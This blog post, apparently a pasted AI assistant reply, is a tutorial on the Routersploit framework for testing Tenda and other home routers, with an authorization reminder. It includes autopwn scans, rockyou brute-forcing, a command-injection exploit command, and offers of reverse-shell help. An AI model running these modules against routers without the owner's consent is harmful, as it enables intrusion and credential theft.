Routersploit Exploitation Framework
**Routersploit** is an open-source exploitation framework specifically designed for **embedded devices** — especially routers, IoT gateways, cameras, and similar low-power network hardware. It's like a "Metasploit for routers": it helps you **discover**, **test**, and (in controlled/authorized scenarios) **exploit** known vulnerabilities in these devices.
In your scenario (securing your own Tenda router, building skills to offer router cleanup/hardening services in Nairobi), Routersploit is one of the **best tools** because:
- Many home/SOHO routers (Tenda, TP-Link, D-Link, Huawei, ZTE, etc.) have old firmware with public exploits.
- It has **autopwn** — auto-tests hundreds of exploits quickly.
- It includes scanners, credential testers, and generic exploits that catch common Tenda issues (command injection, path traversal, auth bypass, etc.), even if no exact "Tenda AC10" module exists.
**Important ethical/legal reminder**
Use **only** on:
- Your own router
- Lab devices / vulnerable firmware in VMs
- Client routers with **written permission** (e.g., WhatsApp: "I authorize testing and fixing my router")
Never on random/public/unauthorized networks — that's illegal.
### 1. Installation on Kali Linux (2026 up-to-date method)
Routersploit is **not** pre-installed in current Kali, so install from the official repo (threat9/routersploit — actively maintained as of March 2026).
Run these in terminal:
```bash
sudo apt update
sudo apt install python3-pip git -y
git clone https://github.com/threat9/routersploit.git
cd routersploit
sudo python3 -m pip install -r requirements.txt
```
(Optional but recommended for some Bluetooth modules):
```bash
sudo python3 -m pip install bluepy
```
To start it:
```bash
sudo python3 rsf.py
```
You'll see an ASCII banner and a prompt like:
```
rsf >
```
To update later (very important — new modules added often):
```bash
cd ~/routersploit
git pull
sudo python3 -m pip install -r requirements.txt --upgrade
```
### 2. Basic Interface & Commands (Metasploit-like)
Routersploit uses the same style as Metasploit:
| Command | What it does | Example |
|----------------------|------------------------------------------------------------------------------|---------|
| `help` | Show all commands | |
| `search <keyword>` | Find modules (e.g., search tenda, search injection, search creds) | `search http` |
| `use <module/path>` | Load a module | `use scanners/autopwn` |
| `show options` | See required/optional settings | |
| `set <option> <value>` | Set value (e.g., target IP) | `set target 192.168.0.1` |
| `run` or `exploit` | Execute the module | |
| `back` | Go back to main prompt | |
| `exit` | Quit | |
Global options (set once for all modules):
```bash
setg target 192.168.0.1
```
### 3. Main Module Categories
- **scanners/** — Check if vulnerable (safest to start with)
- **exploits/** — Try to exploit (RCE, shell, DoS, etc.)
- Subfolders: routers/, cameras/, generic/, misc/
- **creds/** — Brute-force or default creds (telnet, http, snmp)
- **payloads/** — Generate shells (less used for routers)
### 4. Most Useful Modules for Your Tenda / Home Router Scenario
#### A. autopwn — The Killer Feature (Auto Everything)
This scans the target and tries **every possible exploit** that might apply.
```bash
use scanners/autopwn
set target 192.168.0.1 # Your Tenda gateway IP
set port 80 # Usually 80 or 443
run
```
What you'll see:
- It fingerprints the device (brand/model/firmware hints)
- Tests 100–500 exploits quickly
- Outputs: `[+] exploits/some_module is vulnerable!` or `[-] not vulnerable`
- If vulnerable → may give shell, creds dump, or config leak
For Tenda: Often catches generic HTTP command injection, path traversal, or known old exploits.
#### B. Credential Testing (Very Common on Tenda Defaults)
```bash
use creds/routers/http_form_default_creds
set target 192.168.0.1
run
```
Or brute-force:
```bash
use creds/generic/http_basic_brute
set target 192.168.0.1
set user_file /usr/share/wordlists/rockyou.txt # Or small list
set pass_file /path/to/router_passwords.txt
run
```
#### C. Specific Exploit Examples (Generic Ones That Hit Tenda Often)
Search first:
```bash
search injection
search path
search telnet
search http
```
Common ones that work on many budget routers (including some Tenda models/firmwares):
- `exploits/routers/generic/http_command_injection`
- `exploits/routers/generic/path_traversal`
- `exploits/routers/belkin/n750_rce` (similar patterns)
- `exploits/routers/dlink/dir859_auth_bypass_cmd_exec` (auth bypass + cmd exec)
Example usage:
```bash
use exploits/generic/http_command_injection
set target 192.168.0.1
set target_uri /goform/formSetDeviceName # Often guessed from nmap or browser inspection
set cmd "whoami" # Test command
run
```
If it works → escalate to reverse shell by setting payload.
### 5. Workflow for Your Router Service Gigs
1. Nmap first → confirm open ports (80/23/443/etc.)
2. Run `scanners/autopwn` → show client red "[+] vulnerable" lines
3. If creds exposed → demo login
4. If exploit works → show proof (e.g., `cat /etc/passwd` or run `reboot`)
5. **Immediately fix** (firmware update, disable remote/telnet, strong pass, WPA3)
6. Re-run autopwn → show all green "not vulnerable"
7. Charge KSh 4k–8k and give simple report
### 6. Tips & Gotchas for 2026
- Many Tenda vulns (e.g., CVE-2025-1851 AC7 buffer overflow, CVE-2026-1690 HG10 RCE) are **recent** → may not have modules yet. Use generic command injection ones or port PoCs manually.
- Routersploit is Python-based → easy to read/edit modules (in `modules/exploits/routers/generic/`).
- If no exact match → combine with Nuclei + Nmap vuln scripts.
- Update often — threat9 pushes new modules regularly.
Run `use scanners/autopwn` on your Tenda now (set target to 192.168.0.1 or whatever your gateway is) and paste the output here. I'll help interpret what it found and what to fix next.
Want deeper on a specific module (e.g., how to use payloads for reverse shell on router)? Or help modifying a module for a Tenda CVE? Just say. Let's master this tool! 🛡️
Comments
Post a Comment